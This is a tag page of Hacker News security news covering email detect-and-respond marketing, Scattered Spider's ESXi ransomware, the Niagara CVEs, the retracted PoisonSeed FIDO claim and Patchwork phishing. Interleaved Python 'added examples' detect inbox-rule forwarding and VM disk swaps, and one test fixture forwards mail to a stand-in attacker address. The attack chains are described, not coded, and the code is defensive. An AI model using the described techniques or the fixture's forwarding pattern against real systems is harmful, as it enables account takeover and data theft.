Tag: Cyber Security

  • Email Security Is Stuck in the Antivirus Era: Why It Needs a Modern Approach

    Picture this: you’ve hardened every laptop in your fleet with real‑time telemetry, rapid isolation, and automated rollback. But the corporate mailbox—the front door for most attackers—is still guarded by what is effectively a 1990s-era filter.

    This isn’t a balanced approach. Email remains a primary vector for breaches, yet we often treat it as a static stream of messages instead of a dynamic, post-delivery environment. This environment is rich with OAuth tokens, shared drive links, and years of sensitive data.

    The conversation needs to shift. We should stop asking, “Did the gateway block the bad thing?” and start asking, “How quickly can we see, contain, and undo the damage when an attacker inevitably gets in?”

    Looking at email security through this lens forces a fundamental shift toward the same assume-breach, detect-and-respond mindset that already revolutionized endpoint protection.

    The day the wall crumbled

    Most security professionals know the statistics. Phishing and credential theft continue to dominate breach reports, and the financial impact of Business Email Compromise often outweighs ransomware. But the data tells a more interesting story, one that mirrors the decline of legacy antivirus.

    A decade ago, AV was good at catching known threats, but zero-day exploits and novel malware slipped past. Endpoint Detection and Response (EDR) emerged because teams needed visibility after an attacker was already on the machine.

    Email is following the same script. Secure Email Gateways (SEGs) still filter spam and commodity phishing campaigns reasonably well. What they miss are the attacks that define the modern threat landscape:

    • Payload-less Business Email Compromise (BEC)
    • Malicious links that are weaponized after delivery
    • Account takeovers using stolen credentials that involve no malware at all

    Once a single mailbox is compromised, the attacker gains access to a connected graph of OAuth applications, shared files, chat histories, and calendar invites within Microsoft 365 or Google Workspace. Moving laterally through this graph rarely triggers another SEG alert. The damage happens entirely inside the cloud workspace.

    What email security can learn from the endpoint

    In the endpoint world, the breakthrough wasn’t a better blacklist. It was the realization that prevention must be paired with continuous visibility and fast, automated response. EDR platforms gave us the ability to record process trees, registry changes, and network calls. When a threat was detected, a host could be isolated and changes could be rolled back, all from a single console.

    Now imagine giving email administrators the same super‑powers: a rewind button for messages, OAuth scopes and file shares; the ability to freeze—or at least MFA‑challenge—a mailbox the instant a risky rule is created; and a timeline that shows who read which sensitive thread after credentials were stolen.

    This combination of capabilities is what a modern, EDR-like approach to email security provides. It’s a simple idea: assume an attacker will eventually land in a mailbox and build the tooling needed to detect, investigate, and contain the fallout.

    The API-first moment that made it possible

    For years, adding post-delivery controls to email required fragile journaling configurations or heavyweight endpoint agents. The cloud suites quietly solved this problem for us.

    Microsoft Graph and Google’s Workspace APIs now expose the necessary telemetry—mailbox audit logs, message IDs, sharing events, and permission changes—securely over OAuth. The same APIs that provide visibility also provide control. They can revoke a token, pull a delivered message from every inbox, or remove a forwarding rule in seconds.

    The sensors and the actuators are already baked into the platform. We just need to connect them to a workflow that feels like EDR. As we’ve argued in our post, The Evolution of Email Security, this richness of telemetry is what allows security teams to move beyond the whack-a-mole of tuning filter rules. Instead of waiting for a user to report a phish, the platform can notice an impossible-travel sign-in, see that the account immediately created five new sharing links, and automatically remediate the risk.

    Why this matters for lean security teams

    A Director of Security at a small or even mid-size company is often the entire security department, juggling vulnerability management, incident response, and compliance. Tool sprawl is the enemy.

    An EDR-like approach to email collapses several fragmented controls—SEG policy, DLP, incident response playbooks, SaaS-to-SaaS monitoring—into a single surface. There are no MX record changes, no agents to deploy, and no dependency on users clicking a “report phish” button.

    More importantly, it produces metrics that matter. Instead of citing an arbitrary “catch rate,” you can answer board-level questions with concrete data:

    • How quickly do we detect a compromised mailbox?
    • How much sensitive data was accessible before containment?
    • How many risky OAuth grants were revoked this quarter?

    These numbers describe actual risk reduction, not theoretical filter efficacy.

    A pragmatic way to move forward

    This doesn’t have to be an abstract exercise. The path forward is incremental, and each step provides a tangible security benefit.

    1. Enable native audit logs. Both Microsoft 365 and Google Workspace include extensive logging. This is the ground truth you’ll need for any future automation.
    2. Centralize your telemetry. In your SIEM or log platform, start looking for signals of compromise: sudden mail rule creation, mass file downloads, unusual sign-in locations, and new OAuth grants.
    3. Test automated response. Use the native APIs to test “message clawback” with a phishing simulation. Both Microsoft Graph and the Gmail API offer these endpoints out of the box.
    4. Evaluate dedicated platforms. Judge them on their breadth of coverage, the sophistication of their post-compromise playbooks, and the speed between detection and automated action.
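The detection and response loop sketched in steps 1 to 3, as a worked example that is not part of the original article or any vendor's product: it runs over a few constructed Unified Audit Log records (trimmed to the fields used), flags forwarding or delete inbox rules and a sign-in from a new country followed by a burst of sharing links, and maps the findings to the Microsoft Graph endpoints a responder would call. The IP-to-country table is a stand-in for a real GeoIP lookup, and the Graph calls are planned, not executed.

```python
"""Detection over Microsoft 365 Unified Audit Log records and a Graph API
remediation planner. Added example, not the article's or any vendor's code."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records, trimmed to the UAL fields this example reads.
SAMPLE_EVENTS = [
    {"CreationTime": "2025-07-21T08:02:11", "Operation": "UserLoggedIn",
     "UserId": "alice@example.invalid", "ClientIP": "203.0.113.5"},
    {"CreationTime": "2025-07-21T08:31:40", "Operation": "UserLoggedIn",
     "UserId": "alice@example.invalid", "ClientIP": "198.51.100.77"},
    {"CreationTime": "2025-07-21T08:33:02", "Operation": "New-InboxRule",
     "UserId": "alice@example.invalid", "ClientIP": "198.51.100.77",
     "Parameters": [{"Name": "Name", "Value": "."},
                    {"Name": "ForwardTo", "Value": "drop@attacker.invalid"},
                    {"Name": "DeleteMessage", "Value": "True"}]},
    {"CreationTime": "2025-07-21T08:34:10", "Operation": "AnonymousLinkCreated",
     "UserId": "alice@example.invalid", "ClientIP": "198.51.100.77",
     "ObjectId": "https://example-my.sharepoint.invalid/personal/alice/Documents/contracts.xlsx"},
    {"CreationTime": "2025-07-21T08:34:58", "Operation": "SharingLinkCreated",
     "UserId": "alice@example.invalid", "ClientIP": "198.51.100.77",
     "ObjectId": "https://example-my.sharepoint.invalid/personal/alice/Documents/board-deck.pptx"},
    {"CreationTime": "2025-07-21T08:36:21", "Operation": "AnonymousLinkCreated",
     "UserId": "alice@example.invalid", "ClientIP": "198.51.100.77",
     "ObjectId": "https://example-my.sharepoint.invalid/personal/alice/Documents/payroll.csv"},
    {"CreationTime": "2025-07-21T09:10:00", "Operation": "New-InboxRule",
     "UserId": "bob@example.invalid", "ClientIP": "203.0.113.9",
     "Parameters": [{"Name": "Name", "Value": "Newsletters"},
                    {"Name": "MoveToFolder", "Value": "Archive"}]},
]

# Constructed IP -> country table standing in for a real GeoIP lookup.
GEO = {"203.0.113.5": "DE", "203.0.113.9": "DE", "198.51.100.77": "NG"}

FORWARDING_PARAMS = {"ForwardTo", "ForwardAsAttachmentTo", "RedirectTo", "ForwardingSmtpAddress"}
SHARING_OPS = {"SharingLinkCreated", "AnonymousLinkCreated", "SecureLinkCreated"}


def _params(event):
    # Exchange cmdlet audit records carry their arguments as name/value pairs.
    return {p["Name"]: p["Value"] for p in event.get("Parameters", [])}


def _ts(event):
    return datetime.fromisoformat(event["CreationTime"])


def risky_inbox_rules(events):
    """Rules that forward, redirect, or silently delete mail: classic BEC persistence."""
    findings = []
    for e in events:
        if e["Operation"] not in ("New-InboxRule", "Set-InboxRule", "Set-Mailbox"):
            continue
        p = _params(e)
        forwarders = sorted(FORWARDING_PARAMS & p.keys())
        if forwarders or p.get("DeleteMessage") == "True":
            findings.append({"user": e["UserId"], "time": e["CreationTime"],
                             "rule": p.get("Name"), "forwarders": forwarders,
                             "deletes": p.get("DeleteMessage") == "True"})
    return findings


def new_country_then_sharing(events, window=timedelta(minutes=30), min_links=3):
    """Sign-in from a country not seen before for that user, followed within
    `window` by at least `min_links` sharing links. A stand-in for the
    impossible-travel check a real platform would do with geo-distance."""
    by_user = defaultdict(list)
    for e in sorted(events, key=_ts):
        by_user[e["UserId"]].append(e)
    findings = []
    for user, evs in by_user.items():
        seen = set()
        for i, e in enumerate(evs):
            if e["Operation"] != "UserLoggedIn":
                continue
            country = GEO.get(e.get("ClientIP"), "??")
            is_new = bool(seen) and country not in seen
            seen.add(country)
            if not is_new:
                continue
            links = [x["ObjectId"] for x in evs[i + 1:]
                     if x["Operation"] in SHARING_OPS and _ts(x) - _ts(e) <= window]
            if len(links) >= min_links:
                findings.append({"user": user, "time": e["CreationTime"],
                                 "country": country, "links": links})
    return findings


def plan_remediation(rule_findings, travel_findings):
    """Graph API calls a responder would issue (real endpoint paths; not executed here).
    UAL rule records do not carry the messageRule id, so rules are listed first and
    the matching rule is then deleted via /mailFolders/inbox/messageRules/{id}."""
    actions = []
    for f in travel_findings + rule_findings:
        actions.append(("POST", f"/users/{f['user']}/revokeSignInSessions"))
    for f in rule_findings:
        actions.append(("GET", f"/users/{f['user']}/mailFolders/inbox/messageRules"))
    return sorted(set(actions))
```

On the constructed events the rule detector flags only alice's forward-and-delete rule (bob's move-to-folder rule is benign), the travel detector flags alice's Nigerian sign-in followed by three sharing links, and the planner collapses both into one session revocation plus a rule listing.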

    This journey turns guesswork into evidence, a live breach into a contained incident, and keeps the human effort required proportional to your team’s size.

    The bottom line

    No one in 2025 would argue that endpoint antivirus is sufficient on its own. We assume prevention will eventually be bypassed, so we build for detection and response. Email deserves the same pragmatic approach.

    Of course, inbound detection remains critical. But if your security stack can’t also tell you who read a sensitive contract after a mailbox takeover, or prevent that exposure automatically, then you are still operating in the antivirus era. The attackers have moved on. Your inbox, like your laptop, is ready for an upgrade.

    Where Material Security fits in

    Material Security was built on the premise we’ve explored here: email is a dynamic, high-value environment that needs post-delivery defenses, not just another pre-delivery filter.

    Because Material integrates directly with Microsoft 365 and Google Workspace via their native APIs, deployment takes hours, not months, with no disruption to mail flow.

    Once connected, Material records the same fine‑grained telemetry that powers EDR on the endpoint—every mailbox rule, OAuth grant, file share, and sign‑in event—then layers on automated playbooks that shrink a breach window from days to minutes. A suspicious sign‑in can trigger a just‑in‑time MFA challenge, while delivered phish are clawed back across every inbox before they’re even read. Historic mail is wrapped in zero‑knowledge encryption that forces re‑authentication, so stolen credentials alone can’t unlock years of sensitive data.

    Perhaps most importantly for security teams of one, Material folds these controls into a single, searchable timeline. You can answer board‑level questions—What was accessed? Who saw it? How quickly did we contain it?—without stitching together half a dozen logs.

    In short, Material brings the “assume breach, detect fast, respond faster” ethos of modern endpoint defense to the inbox, turning email from a perennial blind spot into a fully monitored, rapidly recoverable asset.


    Source: thehackernews.com…

  • Scattered Spider Hijacks VMware ESXi to Deploy Ransomware on Critical U.S. Infrastructure

    Jul 28, 2025 | Ravie Lakshmanan | Cyber Attack / Ransomware

    The notorious cybercrime group known as Scattered Spider is targeting VMware ESXi hypervisors in attacks against the retail, airline, and transportation sectors in North America.

    “The group’s core tactics have remained consistent and do not rely on software exploits. Instead, they use a proven playbook centered on phone calls to an IT help desk,” Google’s Mandiant team said in an extensive analysis.

    “The actors are aggressive, creative, and particularly skilled at using social engineering to bypass even mature security programs. Their attacks are not opportunistic but are precise, campaign-driven operations aimed at an organization’s most critical systems and data.”

    Also called 0ktapus, Muddled Libra, Octo Tempest, and UNC3944, the threat actors have a history of conducting advanced social engineering attacks to obtain initial access to victim environments and then adopting a “living-off-the-land” (LotL) approach by manipulating trusted administrative systems and leveraging their control of Active Directory to pivot to the VMware vSphere environment.

    Google said the method, which provides a pathway for data exfiltration and ransomware deployment directly from the hypervisor, is “highly effective,” as it bypasses security tools and leaves few traces of compromise.

    The attack chain unfolds over five distinct phases –

    • Initial compromise, reconnaissance, and privilege escalation, allowing the threat actors to harvest information related to IT documentation, support guides, organization charts, and vSphere administrators, as well as enumerate credentials from password managers like HashiCorp Vault or other Privileged Access Management (PAM) solutions. The attackers have been found to make additional calls to the company’s IT help desk to impersonate a high-value administrator and request a password reset to gain control of the account.
    • Pivoting to the virtual environment using the mapped Active Directory-to-vSphere credentials to gain access to the VMware vCenter Server Appliance (vCSA), after which Teleport is executed to create a persistent, encrypted reverse shell that bypasses firewall rules
    • Enabling SSH connections on ESXi hosts and resetting root passwords, and executing what’s called a “disk-swap” attack to extract the NTDS.dit Active Directory database. The attack works by powering off a Domain Controller (DC) virtual machine (VM) and detaching its virtual disk, only to attach it to another, unmonitored VM under their control. After copying the NTDS.dit file, the entire process is reversed and the DC is powered on.
    • Weaponizing the access to delete backup jobs, snapshots, and repositories to inhibit recovery
    • Using the SSH access to the ESXi hosts to push their custom ransomware binary via SCP/SFTP
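    The disk-swap phase above, turned into a detection an analyst could run over vCenter events. This is an added example and not Mandiant's or the article's code; the event records are constructed and flattened (a real VmReconfiguredEvent nests the disk change in configSpec.deviceChange), and the list of domain controller VMs is assumed. The out-and-back movement of a single VMDK between two VMs is the signature being matched, with a power-off of the source VM just before the detach raising confidence.

```python
"""Detect a 'disk swap' (VM powered off, its VMDK detached and attached to
another VM, then returned) from vCenter event records. Added example, not
Mandiant's or the article's code; records are constructed and flattened."""
from datetime import datetime, timedelta

DOMAIN_CONTROLLERS = {"DC01", "DC02"}  # assumed inventory of DC VMs

# Constructed event stream. 'disk' / 'op' only appear on reconfigure events.
SAMPLE_EVENTS = [
    {"time": "2025-07-20T02:00:05", "type": "VmPoweredOffEvent", "vm": "DC01",
     "user": "CORP\\vsphere-admin"},
    {"time": "2025-07-20T02:01:12", "type": "VmReconfiguredEvent", "vm": "DC01",
     "user": "CORP\\vsphere-admin", "disk": "[datastore1] DC01/DC01.vmdk", "op": "remove"},
    {"time": "2025-07-20T02:02:40", "type": "VmReconfiguredEvent", "vm": "STAGE-TMP",
     "user": "CORP\\vsphere-admin", "disk": "[datastore1] DC01/DC01.vmdk", "op": "add"},
    {"time": "2025-07-20T02:35:03", "type": "VmReconfiguredEvent", "vm": "STAGE-TMP",
     "user": "CORP\\vsphere-admin", "disk": "[datastore1] DC01/DC01.vmdk", "op": "remove"},
    {"time": "2025-07-20T02:35:50", "type": "VmReconfiguredEvent", "vm": "DC01",
     "user": "CORP\\vsphere-admin", "disk": "[datastore1] DC01/DC01.vmdk", "op": "add"},
    {"time": "2025-07-20T02:36:30", "type": "VmPoweredOnEvent", "vm": "DC01",
     "user": "CORP\\vsphere-admin"},
    # Benign: a fresh disk added to an app server, never detached from anywhere.
    {"time": "2025-07-20T09:15:00", "type": "VmReconfiguredEvent", "vm": "APP03",
     "user": "CORP\\storage-ops", "disk": "[datastore2] APP03/APP03_1.vmdk", "op": "add"},
]


def _ts(e):
    return datetime.fromisoformat(e["time"])


def detect_disk_swaps(events, dc_names=DOMAIN_CONTROLLERS, window=timedelta(hours=2)):
    """Return one finding per disk that moves from VM A to VM B within `window`.
    If the same disk later returns to A, the finding is annotated rather than
    duplicated: the out-and-back pair is the signature of a swap, not a migration."""
    events = sorted(events, key=_ts)
    last_power_off = {}      # vm -> time of most recent power-off
    pending_removal = {}     # disk path -> (vm it was detached from, time)
    findings = []
    for e in events:
        if e["type"] == "VmPoweredOffEvent":
            last_power_off[e["vm"]] = _ts(e)
            continue
        if e["type"] != "VmReconfiguredEvent":
            continue
        disk, vm, t = e["disk"], e["vm"], _ts(e)
        if e["op"] == "remove":
            pending_removal[disk] = (vm, t)
            continue
        if e["op"] != "add" or disk not in pending_removal:
            continue  # brand-new disk, or an add without a tracked detach: not a move
        src, t_removed = pending_removal.pop(disk)
        if src == vm or t - t_removed > window:
            continue
        # A disk returning to the VM it originally left closes the open finding.
        for f in findings:
            if (f["disk"] == disk and f["source"] == vm and f["target"] == src
                    and "returned_at" not in f):
                f["returned_at"] = e["time"]
                break
        else:
            off = last_power_off.get(src)
            findings.append({
                "disk": disk, "source": src, "target": vm, "by": e["user"],
                "detached_at": t_removed.isoformat(), "attached_at": e["time"],
                "source_powered_off_first": off is not None and off <= t_removed,
                "severity": "critical" if src in dc_names else "medium",
            })
    return findings
```

Run against the sample stream this yields a single critical finding: DC01's disk moved to STAGE-TMP by the vSphere admin account after DC01 was powered off, and came back 33 minutes later. The APP03 disk add produces nothing because no detach preceded it.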

    “UNC3944’s playbook requires a fundamental shift in defensive strategy, moving from EDR-based threat hunting to proactive, infrastructure-centric defense,” Google said. “This threat differs from traditional Windows ransomware in two ways: speed and stealth.”

    The tech giant also called out the threat actors’ “extreme velocity,” stating the whole infection sequence from initial access to data exfiltration and final ransomware deployment can transpire within a short span of a few hours.

    According to Palo Alto Networks Unit 42, Scattered Spider actors have not only become adept at social engineering, but also have partnered with the DragonForce (aka Slippery Scorpius) ransomware program, in one instance exfiltrating over 100 GB of data during a two-day period.

    To counter such threats, organizations are advised to follow three layers of protections –

    • Enable vSphere lockdown mode, enforce execInstalledOnly, use vSphere VM encryption, decommission old VMs, harden the help desk
    • Implement phishing-resistant multi-factor authentication (MFA), isolate critical identity infrastructure, avoid authentication loops
    • Centralize and monitor key logs, isolate backups from production Active Directory, and make sure they are inaccessible to a compromised administrator

    Google is also urging organizations to re-architect the system with security in mind when transitioning from VMware vSphere 7, as it approaches end-of-life (EoL) in October 2025.

    “Ransomware aimed at vSphere infrastructure, including both ESXi hosts and vCenter Server, poses a uniquely severe risk due to its capacity for immediate and widespread infrastructure paralysis,” Google said.

    “Failure to proactively address these interconnected risks by implementing these recommended mitigations will leave organizations exposed to targeted attacks that can swiftly cripple their entire virtualized infrastructure, leading to operational disruption and financial loss.”


    Source: thehackernews.com…

  • Critical Flaws in Niagara Framework Threaten Smart Buildings and Industrial Systems Worldwide

    Cybersecurity researchers have discovered over a dozen security vulnerabilities impacting Tridium’s Niagara Framework that could allow an attacker on the same network to compromise the system under certain circumstances.

    “These vulnerabilities are fully exploitable if a Niagara system is misconfigured, thereby disabling encryption on a specific network device,” Nozomi Networks Labs said in a report published last week. “If chained together, they could allow an attacker with access to the same network — such as through a Man-in-the-Middle (MiTM) position — to compromise the Niagara system.”

    Developed by Tridium, an independent business entity of Honeywell, the Niagara Framework is a vendor-neutral platform used to manage and control a wide range of devices from different manufacturers, such as HVAC, lighting, energy management, and security, making it a valuable solution in building management, industrial automation, and smart infrastructure environments.

    It consists of two key components: Platform, which is the underlying software environment that provides the necessary services to create, manage, and run Stations, and Station, which communicates with and controls connected devices and systems.

    The vulnerabilities identified by Nozomi Networks are exploitable should a Niagara system be misconfigured, causing encryption to be disabled on a network device and opening the door to lateral movement and broader operational disruptions, impacting safety, productivity, and service continuity.

    The most severe of the issues are listed below –

    • CVE-2025-3936 (CVSS score: 9.8) – Incorrect Permission Assignment for Critical Resource
    • CVE-2025-3937 (CVSS score: 9.8) – Use of Password Hash With Insufficient Computational Effort
    • CVE-2025-3938 (CVSS score: 9.8) – Missing Cryptographic Step
    • CVE-2025-3941 (CVSS score: 9.8) – Improper Handling of Windows: DATA Alternate Data Stream
    • CVE-2025-3944 (CVSS score: 9.8) – Incorrect Permission Assignment for Critical Resource
    • CVE-2025-3945 (CVSS score: 9.8) – Improper Neutralization of Argument Delimiters in a Command
    • CVE-2025-3943 (CVSS score: 7.3) – Use of GET Request Method With Sensitive Query Strings

    Nozomi Networks said it was able to craft an exploit chain combining CVE-2025-3943 and CVE-2025-3944 that could enable an adjacent attacker with access to the network to breach a Niagara-based target device, ultimately facilitating root-level remote code execution.

    Specifically, the attacker could weaponize CVE-2025-3943 to intercept the anti-CSRF (cross-site request forgery) refresh token in scenarios where the Syslog service is enabled, causing logs containing the token to be transmitted, potentially over an unencrypted channel.

    Armed with the token, the threat actor can trigger a CSRF attack and lure an administrator into visiting a specially crafted link that causes the content of all incoming HTTP requests and responses to be fully logged. The attacker then extracts the administrator’s JSESSIONID session token, uses it to connect to the Niagara Station with full elevated permissions, and creates a new backdoor administrator user for persistent access.

    In the next stage of the attack, the administrative access is abused to download the private key associated with the device’s TLS certificate and conduct adversary-in-the-middle (AitM) attacks by taking advantage of the fact that both the Station and Platform share the same certificate and key infrastructure.

    With control of the Platform, the attacker could leverage CVE-2025-3944 to facilitate root-level remote code execution on the device, achieving complete takeover. Following responsible disclosure, the issues have been addressed in Niagara Framework and Enterprise Security versions 4.14.2u2, 4.15.u1, or 4.10u.11.

    “Because Niagara often connects critical systems and sometimes bridges IoT technology and information technology (IT) networks, it could represent a high-value target,” the company said.

    “Given the critical functions that can be controlled by Niagara-powered systems, these vulnerabilities may pose a high risk to operational resilience and security provided the instance has not been configured per Tridium’s hardening guidelines and best practices.”

    The disclosure comes as several memory corruption flaws have been discovered in the P-Net C library, an open-source implementation of the PROFINET protocol for IO devices, that, if successfully exploited, could allow unauthenticated attackers with network access to the targeted device to trigger denial-of-service (DoS) conditions.

    “Practically speaking, exploiting CVE-2025-32399, an attacker can force the CPU running the P-Net library into an infinite loop, consuming 100% CPU resources,” Nozomi Networks said. “Another vulnerability, tracked as CVE-2025-32405, allows an attacker to write beyond the boundaries of a connection buffer, corrupting memory and making the device entirely unusable.”

    The vulnerabilities have been resolved in version 1.0.2 of the library, which was released in late April 2025.

    In recent months, several security defects have also been unearthed in Rockwell Automation PowerMonitor 1000, Bosch Rexroth ctrlX CORE, and Inaba Denki Sangyo’s IB-MCT001 cameras that could result in execution of arbitrary commands, device takeover, DoS, information theft, and even remote access to live footage for surveillance.

    “Successful exploitation of these vulnerabilities could allow an attacker to obtain the product’s login password, gain unauthorized access, tamper with product’s data, and/or modify product settings,” the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in an advisory for IB-MCT001 flaws.


    Source: thehackernews.com…

  • PoisonSeed Attack Turns Out to Be Not a FIDO Bypass After All

    Cybersecurity firm Expel, in an update shared on July 25, 2025, said it’s retracting its findings about a phishing attack that it said leveraged cross-device sign-in to get around FIDO account protections despite being not in physical proximity to the authenticating client device.

    “The evidence does show the targeted user’s credentials (username and password) being phished and that the attacker successfully passed password authentication for the targeted user,” the company said.

    “It also shows the user received a QR code from the attacker. This QR code, when scanned by a mobile device, initiates a FIDO Cross-Device Authentication flow, which according to FIDO specification requires local proximity to the device which generated the QR code (the WebAuthn client). When properly implemented, without proximity, the request will time out and fail.”

    The company further said that while the attackers managed to breach the password barrier, further analysis of the Okta logs revealed that all subsequent multi-factor authentication (MFA) challenges failed and that the attackers were not granted access to the requested resource.

    Queries sent by The Hacker News to Expel asking for clarification on the exact method used to achieve a “bypass” received no responses until now. The original story continues below –

    Cybersecurity researchers have disclosed a novel attack technique that allows threat actors to downgrade Fast IDentity Online (FIDO) key protections by deceiving users into approving authentication requests from spoofed company login portals.

    FIDO keys are hardware- or software-based authenticators designed to eliminate phishing by binding logins to specific domains using public-private key cryptography. In this case, attackers exploit a legitimate feature—cross-device sign-in—to trick victims into unknowingly authenticating malicious sessions.

    The activity, observed by Expel as part of a phishing campaign in the wild, has been attributed to a threat actor named PoisonSeed, which was recently flagged as leveraging compromised credentials associated with customer relationship management (CRM) tools and bulk email providers to send spam messages containing cryptocurrency seed phrases and drain victims’ digital wallets.

    “The attacker does this by taking advantage of cross-device sign-in features available with FIDO keys,” researchers Ben Nahorney and Brandon Overstreet said. “However, the bad actors in this case are using this feature in adversary-in-the-middle (AitM) attacks.”

    This technique doesn’t work in all scenarios. It specifically targets users authenticating via cross-device flows that don’t enforce strict proximity checks—such as Bluetooth or local device attestation. If a user’s environment mandates hardware security keys plugged directly into the login device, or uses platform-bound authenticators (like Face ID tied to the browser context), the attack chain breaks.

    Cross-device sign-in allows users to sign in on a device that does not have a passkey using a second device that does hold the cryptographic key, such as a mobile phone.

    The attack chain documented by Expel commences with a phishing email that lures recipients to log into a fake sign-in page mimicking the enterprise’s Okta portal. Once the victims enter their credentials, the sign-in information is stealthily relayed by the bogus site to the real login page.

    The phishing site then instructs the legitimate login page to use the hybrid transport method for authentication, which causes the page to serve a QR code that’s subsequently sent back to the phishing site and presented to the victim.

    Should the user scan the QR code with the authenticator app on their mobile device, it allows the attackers to gain unauthorized access to the victim’s account.

    “In the case of this attack, the bad actors have entered the correct username and password and requested cross-device sign-in,” Expel said.

    “The login portal displays a QR code, which the phishing site immediately captures and relays back to the user on the fake site. The user scans it with their MFA authenticator, the login portal and the MFA authenticator communicate, and the attackers are in.”

    What makes the attack noteworthy is that it gets around protections offered by FIDO keys and enables threat actors to obtain access to users’ accounts. The compromise method does not exploit any flaw in the FIDO implementation. Rather, it abuses a legitimate feature to downgrade the authentication process.

    While FIDO2 is designed to resist phishing, its cross-device login flow—known as hybrid transport—can be misused if proximity verification like Bluetooth is not enforced. In this flow, users can log in on a desktop by scanning a QR code with a mobile device that holds their passkey.

    However, attackers can intercept and relay that QR code in real time via a phishing site, tricking users into approving the authentication on a spoofed domain. This turns a secure feature into a phishing loophole—not due to a protocol flaw, but due to its flexible implementation.
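    Why the relay fails when proximity is enforced, as an added and deliberately simplified model that is not the CTAP 2.2 hybrid transport itself (nor Expel's or the article's code): the Noise handshake and tunnel server are left out, HMAC-SHA256 stands in for the spec's key derivation and advert encryption, and a BleRadio class models physical Bluetooth range. What it keeps is the property that matters: after scanning the QR code the phone sends a BLE advertisement that only the browser holding the QR secret can decrypt, and only if that browser is within radio range. A phishing page can relay the QR image, but it cannot relay the radio.

```python
"""Simplified model of the FIDO2 hybrid ("cross-device") transport proximity
check. Added illustration, not the CTAP 2.2 implementation: key derivation and
advert encryption are stand-ins (HMAC-SHA256), and BleRadio models BLE range."""
import hashlib
import hmac
import secrets
from collections import defaultdict


def _kdf(secret, label):
    return hmac.new(secret, label, hashlib.sha256).digest()


class BleRadio:
    """Adverts are only heard by listeners at the same physical location."""
    def __init__(self):
        self.inbox = defaultdict(list)

    def broadcast(self, location, advert):
        self.inbox[location].append(advert)

    def listen(self, location):
        return list(self.inbox.get(location, []))


class WebAuthnClient:
    """The browser that displays the QR code. Only it knows qr_secret."""
    def __init__(self, location):
        self.location = location
        self.qr_secret = None

    def make_qr(self):
        self.qr_secret = secrets.token_bytes(16)
        return {"qr_secret": self.qr_secret}  # the real QR also carries a P-256 public key

    def complete(self, radio):
        """Authenticate and decrypt a heard BLE advert with the QR-derived key and
        derive the tunnel id. Returns None if nothing usable was heard (timeout)."""
        eid_key = _kdf(self.qr_secret, b"eid-key")
        for advert in radio.listen(self.location):
            body, tag = advert[:10], advert[10:]
            if not hmac.compare_digest(tag, _kdf(eid_key, b"mac" + body)):
                continue  # advert for some other QR, or noise: ignore
            pad = _kdf(eid_key, b"pad")[:10]   # one-time pad: one advert per QR in this model
            nonce = bytes(a ^ b for a, b in zip(body, pad))
            return _kdf(self.qr_secret, b"tunnel" + nonce)
        return None


class PhoneAuthenticator:
    """The device holding the passkey. It scans whatever QR it is shown."""
    def __init__(self, location):
        self.location = location

    def scan(self, qr, radio):
        nonce = secrets.token_bytes(10)
        eid_key = _kdf(qr["qr_secret"], b"eid-key")
        pad = _kdf(eid_key, b"pad")[:10]
        body = bytes(a ^ b for a, b in zip(nonce, pad))
        radio.broadcast(self.location, body + _kdf(eid_key, b"mac" + body))
        return _kdf(qr["qr_secret"], b"tunnel" + nonce)  # tunnel the phone will join


def legitimate_login():
    """Desktop and phone in the same room: both derive the same tunnel id."""
    radio = BleRadio()
    desktop = WebAuthnClient("office-desk")
    phone = PhoneAuthenticator("office-desk")
    phone_tunnel = phone.scan(desktop.make_qr(), radio)
    return desktop.complete(radio) == phone_tunnel


def relayed_login():
    """PoisonSeed-style relay: the attacker's browser generates the QR, the phishing
    page shows it to the victim, and the victim's phone scans it elsewhere."""
    radio = BleRadio()
    attacker_browser = WebAuthnClient("attacker-site")
    victim_phone = PhoneAuthenticator("office-desk")
    victim_phone.scan(attacker_browser.make_qr(), radio)  # advert is sent at office-desk
    return attacker_browser.complete(radio) is not None   # nothing heard at attacker-site
```

The model makes the asymmetry explicit: the victim's desktop is in range of the advert but does not hold the QR secret, and the attacker's browser holds the secret but is not in range. Neither can derive the tunnel, so the flow times out exactly as Expel's retraction describes.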

    Expel also said it observed a separate incident where a threat actor enrolled their own FIDO key after compromising an account through a phishing email and resetting the user’s password.

    To better protect user accounts, organizations should pair FIDO2 authentication with checks that verify the device being used. When possible, logins should happen on the same device holding the passkey, which limits phishing risk. Security teams should watch for unusual QR code logins or new passkey enrollments. Account recovery options should use phishing-resistant methods, and login screens—especially for cross-device sign-ins—should show helpful details like location, device type, or clear warnings to help users spot suspicious activity.

    If anything, the findings underscore the need for adopting phishing-resistant authentication at all steps in an account lifecycle, including during recovery phases, as using an authentication method that’s susceptible to phishing can undermine the entire identity infrastructure.

    “AitM attacks against FIDO keys and attacker-controlled FIDO keys are just the latest in a long line of examples where bad actors and defenders up the ante in the fight to compromise/protect user accounts,” the researchers added.

    (The story was updated after publication to make it more clear that the attack technique does not bypass FIDO protections and that it likely downgrades the authentication to a method that’s susceptible to phishing. It was updated again on July 26, 2025, with information about Expel recanting its findings.)


    Source: thehackernews.com…

  • Patchwork Targets Turkish Defense Firms with Spear-Phishing Using Malicious LNK Files

    Jul 25, 2025 | Ravie Lakshmanan | Malware / Threat Intelligence

    The threat actor known as Patchwork has been attributed to a new spear-phishing campaign targeting Turkish defense contractors with the goal of gathering strategic intelligence.

    “The campaign employs a five-stage execution chain delivered via malicious LNK files disguised as conference invitations sent to targets interested in learning more about unmanned vehicle systems,” Arctic Wolf Labs said in a technical report published this week.

    The activity, which also singled out an unnamed manufacturer of precision-guided missile systems, appears to be geopolitically motivated, as its timing coincides with deepening defense cooperation between Pakistan and Türkiye and the recent India-Pakistan military skirmishes.

    Patchwork, also called APT-C-09, APT-Q-36, Chinastrats, Dropping Elephant, Operation Hangover, Quilted Tiger, and Zinc Emerson, is assessed to be a state-sponsored actor of Indian origin. Known to be active since at least 2009, the hacking group has a track record of striking entities in China, Pakistan, and other countries in South Asia.

    Exactly a year ago, the Knownsec 404 Team documented Patchwork targeting entities with ties to Bhutan to deliver the Brute Ratel C4 framework and an updated version of a backdoor called PGoShell.

    Since the start of 2025, the threat actor has been linked to various campaigns aimed at Chinese universities, with recent attacks using baits related to power grids in the country to deliver a Rust-based loader that, in turn, decrypts and launches a C# trojan called Protego to harvest a wide range of information from compromised Windows systems.

    Another report published by Chinese cybersecurity firm QiAnXin back in May said it identified infrastructure overlaps between Patchwork and DoNot Team (aka APT-Q-38 or Bellyworm), suggesting potential operational connections between the two threat clusters.

